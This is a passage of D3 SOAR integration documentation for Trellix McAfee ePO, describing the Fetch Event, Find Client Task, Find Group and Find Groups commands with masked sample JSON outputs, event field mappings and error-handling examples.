        "LastUpdatedMethod": null,
        "UserGroups": "Administrators",
        "StatusKey": "NEW",
        "IsDLPIncidents": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
  {
      "AutoGUID": "***-***-***-***-***",
      "TargetFileName": "C:\\Users\\Administrator\\Desktop\\atomic-red-team-master\\atomic-red-team-master\\atomics\\T1055\\bin\\T1055.exe",
      "SourceIPV4": "***.***.***.***",
      "SourceProcessName": "C:\\Windows\\explorer.exe",
      "ReceivedUTC": "2020-08-19T10:02:45-07:00",
      "DetectedUTC": "2020-08-19T09:56:35-07:00",
      "AnalyzerName": "McAfee Endpoint Security",
      "AnalyzerVersion": "10.7.0",
      "AnalyzerHostName": "*****-PC5",
      "AnalyzerIPV4": "***.***.***.***",
      "AnalyzerIPV6": "****:****:****:***::****",
      "AnalyzerMAC": "****",
      "AnalyzerDATVersion": "4169.0",
      "AnalyzerEngineVersion": "6100.8979",
      "AnalyzerDetectionMethod": "On-Access Scan",
      "SourceHostName": "***-PC5",
      "SourceIPV6": "****:****:****:***::****",
      "TargetHostName": "***-PC5",
      "TargetIPV4": "***.***.***.***",
      "TargetIPV6": "****:****:****:***::****",
      "TargetUserName": "***-PC5\\Administrator",
      "ThreatEventID": 1027,
      "ThreatSeverity": 2,
      "ThreatName": "RDN/Generic Dropper",
      "ThreatType": "trojan",
      "ThreatActionTaken": "IDS_ALERT_ACT_TAK_DEL",
      "ThreatHandled": true,
      "IsDLPIncidents": false
  },
  {
      "IncidentId": 2,
      "ComputerID": ***,
      "IncidentType": 10000,
      "ViolationLocalTime": "2021-04-08T11:40:08-07:00",
      "ViolationTimezone": "Pacific Daylight Time",
      "TotalMatchCount": 0,
      "TotalContentSize": 0,
      "PolicyInfoId": 2,
      "RulesToDisplay": "Plug and Play Device Rule",
      "SourceApplicationId": null,
      "Severity": 3,
      "StatusId": "2",
      "ResolutionId": "2",
      "ActualAction": 0,
      "ExpectedAction": 0,
      "FailureReason": 0,
      "JustificationText": "",
      "McAfeeAgentGuid": "***-***-***-***-***",
      "EvidenceCount": 0,
      "ReportingProduct": 1,
      "destination": "portable devices",
      "ShortMatchString": "",
      "DestinationUserID": null,
      "ExternalId": null,
      "ActivityEnum": null,
      "Name": "LAPTOP-*****",
      "IP": "***.***.***.***",
      "PrimaryUserAccountID": "LAPTOP-*****\\admin@",
      "Username_NTLM": "LAPTOP-*****\\admin",
      "FQDN": null,
      "UserName": "admin",
      "SID": null,
      "UID": null,
      "UserOU": "",
      "FirstName": null,
      "LastName": null,
      "PrimaryEmailAddress": "",
      "UserTitle": "",
      "UserBusinessUnit": null,
      "UserDepartment": "",
      "UserCity": null,
      "UserCountry": null,
      "UserCompany": null,
      "UserManagerAccountID": "",
      "DLPReviewerUserAccount": null,
      "Custom1": null,
      "Custom2": null,
      "Custom3": null,
      "UserStatus": null,
      "LastDayInOffice": null,
      "LastDayInOfficeYYYYMM": null,
      "LastUpdated": null,
      "LastUpdatedBy": null,
      "LastUpdatedMethod": null,
      "UserGroups": "Administrators",
      "StatusKey": "NEW",
      "IsDLPIncidents": true
  }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "IDs": "\"[\\r\\n \\r\\n  \\\"***-***-***-***-***\\\",\\r\\n \\r\\n  \\\"***-***-***-***-***\\\"\\r\\n \\r\\n ]\"",
    "IncidentIds": "\"[*****]\"",
    "IncidentTypeID": "\"[10000,10000,10000,10000,10000]\"",
    "ComputerNames": "\"[\\r\\n\\t\\\"user\\\"]\"",
    "ComputerIPs": "\"[\\r\\n\\t\\\"1.1.1.1\\\"]\"",
    "ViolationLocalTime": "\"[\\r\\n\\t\\\"2021-04-13 12:57:29\\\",\\r\\n\\t\\\"2021-04-13 12:57:29\\\",\\r\\n\\t\\\"2021-04-13 12:55:57\\\",\\r\\n\\t\\\"2021-04-13 12:55:57\\\",\\r\\n\\t\\\"2021-04-13 12:14:00\\\"\\r\\n]\"",
    "UserName": "\"[\\r\\n\\t\\\"user\\\",\\r\\n\\t\\\"user\\\"]\"",
    "Severity": "\"[3,3,3,3,3]\"",
    "ActualAction": "\"[0,0,0,0,0]\"",
    "ExpectedAction": "\"[0,0,0,0,0]\"",
    "StatusKey": "\"[\\\"NEW\\\",\\\"NEW\\\",\\\"NEW\\\",\\\"NEW\\\",\\\"NEW\\\"]\"",
    "ReviewerUserAccount": "\"[]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

AUTOGUID

TARGETFILENAME

SOURCEIPV4

SOURCEPROCESSNAME

RECEIVEDUTC

DETECTEDUTC

ANALYZERNAME

ANALYZERVERSION

ANALYZERHOSTNAME

ANALYZERIPV4

ANALYZERIPV6

ANALYZERMAC

ANALYZERDATVERSION

ANALYZERENGINEVERSION

ANALYZERDETECTIONMETHOD

SOURCEHOSTNAME

SOURCEIPV6

TARGETHOSTNAME

TARGETIPV4

TARGETIPV6

TARGETUSERNAME

THREATEVENTID

THREATSEVERITY

THREATNAME

THREATTYPE

THREATACTIONTAKEN

THREATHANDLED

***-***-***-***-***

C:\Users\Administrator\Desktop\atomic-red-team-master\atomic-red-team-master\atomics\T1055\bin\T1055.exe

1.1.1.1

C:\Windows\explorer.exe

8/19/2020 10:02:45 AM

8/19/2020 9:56:35 AM

McAfee Endpoint Security

10.7.0

***-PC5

1.1.1.1

0:0:0:0:0:FFFF:C0A0:000B

0***a

4169.0

6100.8979

On-Access Scan

D***-PC5

0:0:0:0:0:FFFF:C0A0:000B

D***-PC5

1.1.1.1

0:0:0:0:0:FFFF:C0A0:000B

D***-PC5\Administrator

1***

2

RDN/Generic Dropper

trojan

IDS_***EL

True

DLP Incidents

INCIDENTID

COMPUTERID

INCIDENTTYPE

VIOLATIONLOCALTIME

VIOLATIONTIMEZONE

TOTALMATCHCOUNT

TOTALCONTENTSIZE

POLICYINFOID

RULESTODISPLAY

SEVERITY

STATUSID

RESOLUTIONID

ACTUALACTION

EXPECTEDACTION

FAILUREREASON

JUSTIFICATIONTEXT

MCAFEEAGENTGUID

EVIDENCECOUNT

REPORTINGPRODUCT

DESTINATION

SHORTMATCHSTRING

NAME

IP

PRIMARYUSERACCOUNTID

USERNAME_NTLM

USERNAME

USEROU

PRIMARYEMAILADDRESS

USERTITLE

USERDEPARTMENT

USERMANAGERACCOUNTID

USERGROUPS

STATUSKEY

LOCALTIME

***

1***

10000

4/13/2021 12:57:29 PM

Pacific Summer Time

0

0

4

Plug and Play Device Rule

3

2

1

0

0

0

1***-***-***-***-***

0

1

universal serial bus controllers

user

1.1.1.1

user@

user

user

Administrators

NEW

4/13/2021 12:57:29 PM (Pacific Summer Time)

Fetch Event Field Mapping

Please note that Fetch Event commands require event field mapping. Field mapping plays a key role in the data normalization process part of the event pipeline. Field mapping converts the original data fields from the different providers to the D3 fields which are standardized by the D3 Model. Please refer to Event and Incident Intake Field Mapping for details.

If you require a custom field mapping, click + Add Field to add a custom field mapping. You can also remove built-in field mappings by clicking x. Please note that two underscore characters will automatically prefix the defined Field Name as the System Name for a custom field mapping. Additionally, if an input Field Name contains any spaces, they will automatically be replaced with underscores for the corresponding System Name.

The Trellix McAfee ePO integration in D3 SOAR has separate pre-configured field mappings for events and DLP incidents since the returned raw data to both fields are different, which correspond to the Default Event Source and DLP Incidents mappings:

  • Default Event Source
    Configures the field mapping which are specific to the events. If a source field in the field mapping is not found, the corresponding field mapping will be ignored. The default event source has a “Main Event JSON Path” (i.e., $) that is used to extract a batch of events from the response raw data. Click Edit Event Source to view the “Main Event JSON Path”.

    • Main Event JSON Path: $
      The Main Event JSON Path determines the root path where the system starts parsing raw response data into D3 event data. The JSON path begins with $, representing the root element. The path is formed by appending a sequence of child elements to $, each separated by a dot (.). Square brackets with nested quotation marks ([‘...’]) should be used to separate child elements in JSON arrays.
      For example, the root node of a JSON Path is $. The child node denoting the Unique Event Key field would be AutoGUID. Putting it together, the JSON Path expression to extract the Unique Event Key is $.AutoGUID.

  • Event Source for DLP Incidents

    Configures the field mapping which are specific to the DLP Incidents. If a source field in the field mapping is not found, the corresponding field mapping will be ignored. As the data of the DLP Incidents have a character that the value of the IsDLPIncident field is True, the DLP Incidents can be defined by the Search String: {$.IsDLPIncident}=True. Click Edit Event Source to view the Search String.

The pre-configured field mappings are detailed below:

Field Name

Source Field

Default Event Source (Main Event JSON Path: $)

None

.AnalyzerDATVersion

None

.AnalyzerDetectionMethod

None

.AnalyzerEngineVersion

None

.AnalyzerHostName

None

.AnalyzerIPV4

None

.AnalyzerMAC

None

.AnalyzerName

None

.AnalyzerVersion

Application layer protocol

.TargetProtocol

Call trace

.SourceDescription

Destination IP address

.TargetIPV4

Destination port

.TargetPort

Destination MAC

.TargetMAC

Driver image path

.TargetFileName

Unique Event Key

.AutoGUID

EventTime/UtcTime

.DetectedUTC

Event Type

.ThreatType

Filename

.TargetFileName

ParentImage

.SourceParentProcessName

Parent process name

.SourceParentProcessName

Process command line

.SourceDescription

Process file path

.SourceFilePath

Process Hash

.SourceProcessHash

Process Name

.SourceProcessName

Receipt time

.TargetCreateTime

Registry path

TargetFileName

Source hostname

.SourceHostName

Source IP address

.SourceIPV4

Source port

.SourcePort

Source MAC address

.SourceMAC

Source username

.SourceUserName

None

.TargetHostName

Target image

.TargetFileName

Target process name

.TargetProcessName

Threat action taken

.ThreatActionTaken

Threat event ID

.ThreatEventID

Threat handled

.ThreatHandled

Threat name

.ThreatName

Threat severity

.ThreatSeverity

Threat type

.ThreatType

URL

.TargetURL

Username

.TargetUserName

Start time (UTC)

.DetectedUTC

Event Source for DLP Incidents (Search String: {$.IsDLPIncident}=True)

The search string format is {jsonpath}=value. If the value of the IsDLPIncident key is True in the event object under raw data, then the DLP Incidents will use the field mapping below.

__ViolationLocalTime

.LocalTime

Device IP address

.IP

Unique Event Key

.IncidentId

Event Type

.RulesToDisplay

Hostname

.Name

Start Time

.ViolationLocalTime

Severity

.Severity

Status

.StatusKey

Username

.UserName

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Fetch Event failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 400.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: This error might be caused by incorrect search condition. Please refer to sample data for syntax of search condition. Also, you can refer to McAfee document <https://docs.mcafee.com/bundle/epolicy-orchestrator-web-api-reference-guide/page/GUID-***-***-***-***-***.html> for detailed syntax.

Error Sample Data

Fetch Event failed.

Status Code: 400.

Message: This error might be caused by incorrect search condition. Please refer to sample data for syntax of search condition. Also, you can refer to McAfee document <https://docs.mcafee.com/bundle/epolicy-orchestrator-web-api-reference-guide/page/GUID-***-***-***-***-***.html> for detailed syntax.

Find Client Task

Retrieves client task details based on the provided search text.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The search text defining the condition to retrieve client task details.

Endpoint Security Threat Prevention

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Full Scan",
        "typeId": 13,
        "objectId": 18,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Quick Scan",
        "typeId": 13,
        "objectId": 19,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "New Task",
        "typeId": 11,
        "objectId": 91,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "Run_ODS_CWS",
        "typeId": 11,
        "objectId": 147,
        "productName": "Endpoint Security Threat Prevention "
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Full Scan",
        "typeId": 13,
        "objectId": 18,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Quick Scan",
        "typeId": 13,
        "objectId": 19,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "New Task",
        "typeId": 11,
        "objectId": 91,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "Run_ODS_CWS",
        "typeId": 11,
        "objectId": 147,
        "productName": "Endpoint Security Threat Prevention "
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: McAfee Agent Statistics\\\",\\\"objectName\\\":\\\"Collect All\\\",\\\"typeId\\\":4,\\\"objectId\\\":7,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: Product Deployment\\\",\\\"objectName\\\":\\\"McAfee Active Response 2.4.0.158\\\",\\\"typeId\\\":2,\\\"objectId\\\":21,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: Product Deployment\\\",\\\"objectName\\\":\\\"McAfee Active Response 2.4.4.404\\\",\\\"typeId\\\":2,\\\"objectId\\\":23,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: McAfee Agent Statistics\\\",\\\"objectName\\\":\\\"On-Demand Scan - Full Scan\\\",\\\"typeId\\\":4,\\\"objectId\\\":24,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: McAfee Agent Statistics\\\",\\\"objectName\\\":\\\"On-Demand Scan - Quick Scan\\\",\\\"typeId\\\":4,\\\"objectId\\\":25,\\\"productName\\\":\\\"McAfee Agent \\\"}]\"",
    "objectId": "\"[\\r\\n \\r\\n  18,\\r\\n \\r\\n  19,\\r\\n \\r\\n  91,\\r\\n \\r\\n  147\\r\\n \\r\\n ]\"",
    "objectName": "\"[\\r\\n \\r\\n  \\\"On-Demand Scan - Full Scan\\\",\\r\\n \\r\\n  \\\"On-Demand Scan - Quick Scan\\\",\\r\\n \\r\\n  \\\"New Task\\\",\\r\\n \\r\\n  \\\"Run_ODS_CWS\\\"\\r\\n \\r\\n ]\"",
    "productId": "\"[\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\"\\r\\n \\r\\n ]\"",
    "productName": "\"[\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\"\\r\\n \\r\\n ]\"",
    "typeId": "\"[\\r\\n \\r\\n  13,\\r\\n \\r\\n  13,\\r\\n \\r\\n  11,\\r\\n \\r\\n  11\\r\\n \\r\\n ]\"",
    "typeName": "\"[\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Policy Based On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Policy Based On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Custom On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Custom On-Demand Scan\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

productId

typeName

objectName

typeId

objectId

productName

ENDP_AM_1000

Endpoint Security Threat Prevention: Policy Based On-Demand Scan

On-Demand Scan - Full Scan

13

18

Endpoint Security Threat Prevention

ENDP_AM_1000

Endpoint Security Threat Prevention: Policy Based On-Demand Scan

On-Demand Scan - Quick Scan

13

19

Endpoint Security Threat Prevention

ENDP_AM_1000

Endpoint Security Threat Prevention: Custom On-Demand Scan

New Task

11

91

Endpoint Security Threat Prevention

ENDP_AM_1000

Endpoint Security Threat Prevention: Custom On-Demand Scan

Run_ODS_CWS

11

147

Endpoint Security Threat Prevention

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Client Task failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Client Task failed.

Status Code: 401.

Message: Unauthorized.

Find Group

Retrieves group information based on the provided search text.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The search text defining the condition to retrieve group information.

AD Domain Controllers

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"groupId\\\":2,\\\"groupPath\\\":\\\"My Organization\\\"},{\\\"groupId\\\":3,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\"},{\\\"groupId\\\":4,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\WORKGROUP\\\"},{\\\"groupId\\\":5,\\\"groupPath\\\":\\\"My Organization\\\\\\\\d3cyber7.local\\\"},{\\\"groupId\\\":6,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\d3cyber7.local\\\"}]\\r\\n\"",
    "groupId": "\"[\\r\\n\\t\\t\\t7\\r\\n\\t\\t]\"",
    "groupPath": "\"[\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\AD Domain Controllers\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

groupId

groupPath

7

My Organization\Servers\AD Domain Controllers

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Group failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Group failed.

Status Code: 401.

Message: Unauthorized.

Find Groups

Retrieves a list of all groups.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "groupId": 2,
        "groupPath": "My Organization"
    },
    {
        "groupId": 3,
        "groupPath": "My Organization\\Lost and Found"
    },
    {
        "groupId": 4,
        "groupPath": "My Organization\\Laptops"
    },
    {
        "groupId": 5,
        "groupPath": "My Organization\\Workstations"
    },
    {
        "groupId": 6,
        "groupPath": "My Organization\\Servers"
    },
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    },
    {
        "groupId": 8,
        "groupPath": "My Organization\\Servers\\DHCP and WINS Servers"
    },
    {
        "groupId": 9,
        "groupPath": "My Organization\\Servers\\Mail Servers"
    },
    {
        "groupId": 10,
        "groupPath": "My Organization\\Servers\\Sharepoint Servers"
    },
    {
        "groupId": 11,
        "groupPath": "My Organization\\Servers\\SQL Servers"
    },
    {
        "groupId": 13,
        "groupPath": "My Organization\\Lost and Found\\QA"
    },
    {
        "groupId": 14,
        "groupPath": "My Organization\\Lost and Found\\WORKGROUP"
    },
    {
        "groupId": 15,
        "groupPath": "My Organization\\My Group"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "groupId": 2,
        "groupPath": "My Organization"
    },
    {
        "groupId": 3,
        "groupPath": "My Organization\\Lost and Found"
    },
    {
        "groupId": 4,
        "groupPath": "My Organization\\Laptops"
    },
    {
        "groupId": 5,
        "groupPath": "My Organization\\Workstations"
    },
    {
        "groupId": 6,
        "groupPath": "My Organization\\Servers"
    },
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    },
    {
        "groupId": 8,
        "groupPath": "My Organization\\Servers\\DHCP and WINS Servers"
    },
    {
        "groupId": 9,
        "groupPath": "My Organization\\Servers\\Mail Servers"
    },
    {
        "groupId": 10,
        "groupPath": "My Organization\\Servers\\Sharepoint Servers"
    },
    {
        "groupId": 11,
        "groupPath": "My Organization\\Servers\\SQL Servers"
    },
    {
        "groupId": 13,
        "groupPath": "My Organization\\Lost and Found\\QA"
    },
    {
        "groupId": 14,
        "groupPath": "My Organization\\Lost and Found\\WORKGROUP"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "groupIds": "\"[\\r\\n\\t\\t\\t2,\\r\\n\\t\\t\\t3,\\r\\n\\t\\t\\t4,\\r\\n\\t\\t\\t5,\\r\\n\\t\\t\\t6,\\r\\n\\t\\t\\t7,\\r\\n\\t\\t\\t8,\\r\\n\\t\\t\\t9,\\r\\n\\t\\t\\t10,\\r\\n\\t\\t\\t11,\\r\\n\\t\\t\\t13,\\r\\n\\t\\t\\t14,\\r\\n\\t\\t\\t15,\\r\\n\\t\\t\\t27,\\r\\n\\t\\t\\t28,\\r\\n\\t\\t\\t29,\\r\\n\\t\\t\\t30,\\r\\n\\t\\t\\t31,\\r\\n\\t\\t\\t32,\\r\\n\\t\\t\\t33,\\r\\n\\t\\t\\t34,\\r\\n\\t\\t\\t35,\\r\\n\\t\\t\\t36,\\r\\n\\t\\t\\t37,\\r\\n\\t\\t\\t38,\\r\\n\\t\\t\\t39,\\r\\n\\t\\t\\t40,\\r\\n\\t\\t\\t41,\\r\\n\\t\\t\\t42,\\r\\n\\t\\t\\t43,\\r\\n\\t\\t\\t44,\\r\\n\\t\\t\\t45,\\r\\n\\t\\t\\t46,\\r\\n\\t\\t\\t47,\\r\\n\\t\\t\\t48,\\r\\n\\t\\t\\t49,\\r\\n\\t\\t\\t51\\r\\n\\t\\t]\"",
    "groupPaths": "\"[\\r\\n\\t\\t\\t\\\"My Organization\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Lost and Found\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Laptops\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Workstations\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\AD Domain Controllers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\DHCP and WINS Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\Mail Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\Sharepoint Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\SQL Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\QA\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\WORKGROUP\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Timmy-Group (2)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 2\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 3\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\eu-north-1\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Mumbai)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\eu-west-3\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\EU (London)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\EU (Ireland)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Seoul)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Tokyo)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\South America (Sao Paulo)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Canada (Central)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Singapore)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Sydney)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\EU (Frankfurt)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (N. Virginia)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (Ohio)\\\",\\r\\n\\t\\t\\t\\\"My 